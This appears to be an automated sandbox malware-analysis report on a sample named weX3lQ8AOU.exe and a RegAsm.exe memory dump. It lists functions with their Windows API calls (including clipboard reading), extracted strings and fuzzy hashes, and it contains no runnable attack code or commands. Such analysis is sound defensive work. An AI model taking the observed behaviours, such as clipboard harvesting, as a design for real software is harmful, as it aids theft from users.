Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
Instruction ID: 797d091bbb829d4e8b0eea89e00af225cce609620468ab5527f299f1bcc47ce9
Opcode Fuzzy Hash: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
Instruction Fuzzy Hash: 2D414771504301AFC304DF29C841A9BB7E8EF89310F14862FF994A76A1E778E945CB99

Function 0040A430 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A46F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A523

Strings

csm, xrefs: 0040A50D

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 2e999a1580a82348229a279466bd0bfc2513c0ac70a5a2249b741fcd72562a23
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 2741C834A00318ABCF10DF69C844A9E7BB0FF45314F1481A6E8146B3D2D779E961CB9A

Function 0040AD3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD62

Strings

RCC, xrefs: 0040AD7C
MOC, xrefs: 0040AD74

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95

Function 00407EA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407EAE
___raise_securityfailure.LIBCMT ref: 00407F6B

Strings

@SC, xrefs: 00407F66

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 10e33e2e5eb9a3d5286ccbecc20551b6eaee076d59bf9c7ce06d7c1cd455d27c
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: 2D11E3B4651A04DBD318CF15F8817883BA4BB28346B50B03AE8088B371E3B09595CF5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058C9
Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058ED

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: 698a41e2f8890499ec269fe88a942146f7bab7e11b1414401b60b7a9d3f26e65
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: 90F01D71515B408ED370DF3A8404743BEE0AF29714F048E2EE4CAD7A92E379E508CBA9

Function 00405ABE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405AC5

Strings

A]@, xrefs: 00405AEB
pdB, xrefs: 00405B01

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: A]@$pdB
API String ID: 431132790-1964063989
Opcode ID: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
Instruction ID: 9708e6e5fcb6faf266b2e239077eb0a834cba51f5faa1665736d4655e106cb5a
Opcode Fuzzy Hash: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
Instruction Fuzzy Hash: AE01D6B4A00615CFC761DF68C580A5ABBF0FF08344B51896EE489DB751D7B5AA40CF98

Analysis Process: weX3lQ8AOU.exePID: 3240, Parent PID: 2836COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	48
Total number of Limit Nodes:	9

Executed Functions

Function 0018D2C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0018D2D1
GetCurrentThreadId.KERNEL32 ref: 0018D2E6
GetCurrentProcessId.KERNEL32 ref: 0018D2EC
ExitProcess.KERNEL32 ref: 0018D4B0

Strings

edgf, xrefs: 0018D44E
'GFA, xrefs: 0018D3C3, 0018D3CB

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: 'GFA$edgf
API String ID: 1029096631-957644222
Opcode ID: 34ca5b166c49600e7bc2d8b145c0c1d18082968aa1bc893ec30fa7af01e7c725
Instruction ID: ab480d2f81f683c2de3a7371612e57dc4ff6928969dc63a2120b978963a2e96d
Opcode Fuzzy Hash: 34ca5b166c49600e7bc2d8b145c0c1d18082968aa1bc893ec30fa7af01e7c725
Instruction Fuzzy Hash: B241367440D380ABC301BF58E594A2EFBE6AF62705F148D1CE5C4876A2C73AD9508F63

Function 001C7560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(001C4FF1,00000001,00000005,?,00000000,?,?,001A14D5), ref: 001C758E

Strings

7654, xrefs: 001C7564
7654, xrefs: 001C7582

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654$7654
API String ID: 2994545307-1888865020
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 001C4282 Relevance: 1.6, APIs: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 001C4306

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 66e21551acb981eddcfb107046627db2125c7ae997b4fea2755bd6c89efd74c2
Instruction ID: d240fd8c78d07c86754c29d3383538ad6ae33f766541b33a05127a3447ec0857
Opcode Fuzzy Hash: 66e21551acb981eddcfb107046627db2125c7ae997b4fea2755bd6c89efd74c2
Instruction Fuzzy Hash: A8014B7460E240EFC305EB48E8A1F1ABBE5EB9A701F14881DE4C5877A1C335DC90CB92

Function 001C4200 Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 001C4257

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 020117099a0ed45299f91afcdbce8de9281da9625e7130e97f4bf9ec5df84b5b
Instruction ID: 5c105ba4ed8a97ab96bf1ed40fabc8b37d35d27c6800f3517041f89999671f97
Opcode Fuzzy Hash: 020117099a0ed45299f91afcdbce8de9281da9625e7130e97f4bf9ec5df84b5b
Instruction Fuzzy Hash: 19F0127810C280ABD601EB58E991E1EFBF5EB65701F44882CF4C487262C33AE820DB62

Function 001C6F80 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNELBASE(0018D4AE), ref: 001C6F8B

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5b27993a27a73a3c61c8f639ed7b8a61559bbbea10c64f3a26697eede5eebfbe
Instruction ID: 983f0f91766454efb729b31dd23d37636767a2cd64cc129dfb75505054ba872b
Opcode Fuzzy Hash: 5b27993a27a73a3c61c8f639ed7b8a61559bbbea10c64f3a26697eede5eebfbe
Instruction Fuzzy Hash: 18A00234417042ABCF456B25ED49B183B21B7E0307350405BF51951876DF21A4A0EA15

Non-executed Functions

Function 001B9000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001B9010
GetWindowLongW.USER32 ref: 001B9035
GetClipboardData.USER32 ref: 001B9045
GlobalLock.KERNEL32 ref: 001B9068
GlobalUnlock.KERNEL32 ref: 001B914A
CloseClipboard.USER32 ref: 001B9155

Strings

e, xrefs: 001B90D1
3, xrefs: 001B9090
?, xrefs: 001B90BD

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: 3$?$e
API String ID: 2832541153-3975470078
Opcode ID: 0476d32f0c639bc6f5d403da628ca0aa36966dfe6ecc326b5f984eb5e362feac
Instruction ID: 0fbca35cdc6f89dd0ed54b759226286f044a600bdba81727f3346ced1e924751
Opcode Fuzzy Hash: 0476d32f0c639bc6f5d403da628ca0aa36966dfe6ecc326b5f984eb5e362feac
Instruction Fuzzy Hash: 7A416E7040C3818ED311EF3C948876EBFE49B96324F154A6DF4DA86292C775C58ADBA3

Function 001C004B Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 420COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 001BFED4
VariantInit.OLEAUT32(?), ref: 001C0071
VariantClear.OLEAUT32(?), ref: 001C0130
SysFreeString.OLEAUT32(?), ref: 001C0155
SysFreeString.OLEAUT32(?), ref: 001C0162
SysFreeString.OLEAUT32(?), ref: 001C0179

Strings

7654, xrefs: 001C048D
4`[b, xrefs: 001C0430

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: String$Free$Variant$ClearInit
String ID: 4`[b$7654
API String ID: 4205145696-3675246634
Opcode ID: 3c5403d2ae04ede2dacd82807fae06793fe356922565d9feed45ce6c4c960beb
Instruction ID: eda76ba32e8679d0eb5a546e133bf15264fbf228e61c8b265df762487984085b
Opcode Fuzzy Hash: 3c5403d2ae04ede2dacd82807fae06793fe356922565d9feed45ce6c4c960beb
Instruction Fuzzy Hash: C0E1F975A09300DFDB04CF68E882BAEBBB2FB98305F14882DF985A7290D735D841CB51

Function 001BFD0E Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 403memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 001BFD6C
SysAllocString.OLEAUT32 ref: 001BFE2C

Strings

7654, xrefs: 001C048D
4`[b, xrefs: 001C0430
,/, xrefs: 001BFDD9

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: AllocString
String ID: ,/$4`[b$7654
API String ID: 2525500382-138038313
Opcode ID: c19fcdb05924c63e9896ecaf8eefc366703e8be433d5a7b79ee7346ac2acbaea
Instruction ID: c1c71d1a1bbbe4a444c02614236062afd1ac471a96dbb7777d50d10956979ee6
Opcode Fuzzy Hash: c19fcdb05924c63e9896ecaf8eefc366703e8be433d5a7b79ee7346ac2acbaea
Instruction Fuzzy Hash: 84E1FD74A09301EFDB108FA8EC81B6EBBB2FB99305F14482DF589A7291D731D951CB52

Function 001B81AA Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2da3bd934f26a15d23697a574f47b1ec2485f6e12edcbdefa6e53c824cad88c
Instruction ID: c2bed21f2ddac3834e3a0d4c3a0abbb5239f07eeabe7229dbf23d6869fa205be
Opcode Fuzzy Hash: b2da3bd934f26a15d23697a574f47b1ec2485f6e12edcbdefa6e53c824cad88c
Instruction Fuzzy Hash: 2721A8F0904B40AFD360EF3AC90675BBEE8EB45350F104A1DF8AA87691D371A5458FD6

Function 001B71AB Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 89COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001B71C3
VariantInit.OLEAUT32 ref: 001B71CF

Strings

V, xrefs: 001B721F
?, xrefs: 001B7227
-, xrefs: 001B7247
?, xrefs: 001B7237
e, xrefs: 001B7263
H, xrefs: 001B723F
(, xrefs: 001B724F
0, xrefs: 001B71FF
!, xrefs: 001B722F
7, xrefs: 001B7257
#, xrefs: 001B7207
8, xrefs: 001B720F
9, xrefs: 001B71EF
2, xrefs: 001B71F7
4, xrefs: 001B7217

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
API String ID: 2610073882-164105402
Opcode ID: 7f6b672aa1f1c8d5f16bb81efe3a78285321a671e7a7602d4b6b1c3922bdc54c
Instruction ID: bc7a8f1bc62cd910838ff0081b07df21559a017616e7ccd10485042884765377
Opcode Fuzzy Hash: 7f6b672aa1f1c8d5f16bb81efe3a78285321a671e7a7602d4b6b1c3922bdc54c
Instruction Fuzzy Hash: ED4109600087C1CEC726CF2984C8606BFA16F16224F488ADDD8E54F7DBC375D555C7A2

Function 001B5993 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 81COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001B599D
VariantInit.OLEAUT32 ref: 001B59A9

Strings

4, xrefs: 001B59F1
!, xrefs: 001B5A09
V, xrefs: 001B59F9
8, xrefs: 001B59E9
#, xrefs: 001B59E1
?, xrefs: 001B5A11
0, xrefs: 001B59D9
?, xrefs: 001B5A01
7, xrefs: 001B5A31
e, xrefs: 001B5A3D
9, xrefs: 001B59C9
-, xrefs: 001B5A21
2, xrefs: 001B59D1
(, xrefs: 001B5A29
H, xrefs: 001B5A19

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
API String ID: 2610073882-164105402
Opcode ID: 3798b011ef43e817e5006f6215178280137eb3ecd35c39d0858b60809e72bffa
Instruction ID: 48d9feace45a78134bae5d8cfffedaf0336337623b1f59014b082ac44af549fc
Opcode Fuzzy Hash: 3798b011ef43e817e5006f6215178280137eb3ecd35c39d0858b60809e72bffa
Instruction Fuzzy Hash: F841B6601087C1CED726DF388488616BFA16B26224F488ADDD8E54F79BC375E515CBA2

Function 001B6BEE Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001B6BF4
VariantInit.OLEAUT32 ref: 001B6C03

Strings

{, xrefs: 001B6C4F
w, xrefs: 001B6C3F
a, xrefs: 001B6C67
2, xrefs: 001B6C43
c, xrefs: 001B6C6F
g, xrefs: 001B6C7F
y, xrefs: 001B6C47
s, xrefs: 001B6C2F
u, xrefs: 001B6C37
q, xrefs: 001B6C27
e, xrefs: 001B6C77
}, xrefs: 001B6C57
i, xrefs: 001B6C87
f, xrefs: 001B6C83

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: Variant$ClearInit
String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
API String ID: 2610073882-100263010
Opcode ID: f2c332744f39517e56f96abe2bb027409c0101e5dd7cd959fbbf101185e44be1
Instruction ID: c23d897744d7788a60264d0f35d5338de3ad7c049394a801feb66253973451c7
Opcode Fuzzy Hash: f2c332744f39517e56f96abe2bb027409c0101e5dd7cd959fbbf101185e44be1
Instruction Fuzzy Hash: 5E41E530508B818ED715DF38C488616BFE1AF16314F088A9CD8EA4F797C779E519CBA2

Function 001B7333 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 77COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(04EC839E), ref: 001B733D
VariantInit.OLEAUT32 ref: 001B734C

Strings

g, xrefs: 001B73C8
f, xrefs: 001B73CC
{, xrefs: 001B7398
e, xrefs: 001B73C0
a, xrefs: 001B73B0
c, xrefs: 001B73B8
}, xrefs: 001B73A0
u, xrefs: 001B7380
w, xrefs: 001B7388
i, xrefs: 001B73D0
q, xrefs: 001B7370
s, xrefs: 001B7378
y, xrefs: 001B7390
2, xrefs: 001B738C

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: Variant$ClearInit
String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
API String ID: 2610073882-100263010
Opcode ID: 87c8b2ba121b5434c25ea00cfbc9b3d7bd26ac290a19bbf5b7b5d7640da8598e
Instruction ID: 701b3959810eda085bf71d66aeb43bcb304ed0b99e0d5d9e786678f90ace3f85
Opcode Fuzzy Hash: 87c8b2ba121b5434c25ea00cfbc9b3d7bd26ac290a19bbf5b7b5d7640da8598e
Instruction Fuzzy Hash: 8F41D430508B818ED715DF28C5C8716BFE1AB16314F088A8CD8EA4F797C3B5E515CBA2

Function 001A8680 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 391COMMON

Download Yara Rule

Strings

L!_#, xrefs: 001A89D4, 001A89DD
AK, xrefs: 001A8B3B
dE;G, xrefs: 001A8965
I\, xrefs: 001A8B53
D^, xrefs: 001A8B4B
8U!W, xrefs: 001A8945

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID:
String ID: 8U!W$AK$D^$I\$L!_#$dE;G
API String ID: 0-1822214113
Opcode ID: adeaa873565a66dde7e13b37ba90f92fd88ee0bf6dcf2158abbb5a00c2d255ae
Instruction ID: 8e66911c9cf90c0e65c2223349eac9d69c0b777e032cdccc20ee891966f82459
Opcode Fuzzy Hash: adeaa873565a66dde7e13b37ba90f92fd88ee0bf6dcf2158abbb5a00c2d255ae
Instruction Fuzzy Hash: EEE172B8509340ABD310DF55E980A2BBBF0EF96B44F50491DF5D58B262E738C905CBA7

Function 001B61D5 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 001B6253

Strings

/, xrefs: 001B61FE
0, xrefs: 001B6414
., xrefs: 001B61FA
-, xrefs: 001B61F6
3, xrefs: 001B61EE
1, xrefs: 001B61E6

Memory Dump Source

Source File: 00000011.00000002.2431345489.0000000000181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00180000, based on PE: true

